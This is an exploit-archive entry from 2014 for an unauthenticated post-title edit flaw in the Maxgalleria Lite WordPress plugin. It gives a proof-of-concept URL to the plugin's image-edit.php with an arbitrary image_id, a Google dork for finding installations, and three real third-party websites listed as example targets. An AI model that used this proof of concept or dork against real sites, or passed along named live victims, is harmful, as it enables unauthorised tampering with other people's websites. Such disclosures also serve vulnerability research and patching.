id: 22371
date: 06/27/2014
title: Wordpress Plugin Maxgalleria Lite Wordpress Post Title Edit Vulnerbility
author: Aloulou
cves: 

############################################################################
  
# Title : Wordpress Plugin Maxgalleria lite wordpress Post Title Edit Vulnerbility  
  
# Author : Aloulou                                            
  
# Date : 25/06/2014                                                   
  
# Facebook :   facebook.com/Aloulou.TN                              
  
# Email: aloulou@alquds.com
  
# Vendor : www.wordpress.org                                                    
  
# Google Dork : inurl:/wp-content/plugins/maxgalleria-lite/m          
  
# Tested on : Linux
                         
  
  
############################################################################
  
 
  
Exploit/POC:
  
http://127.0.0.1/wp-content/plugins/maxgalleria-lite/meta/image-edit.php?image_id=1337  (you can change the image_id to any ) 
 
Post Path: 
     http://127.0.0.1/?p=1337
  
Examples:

http://livingministry.org/blog/?p=99
http://retromuzyka.pl/?p=200
http://www.trueartsreptiles.com/?p=100

      	
  
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2023-03-26]  #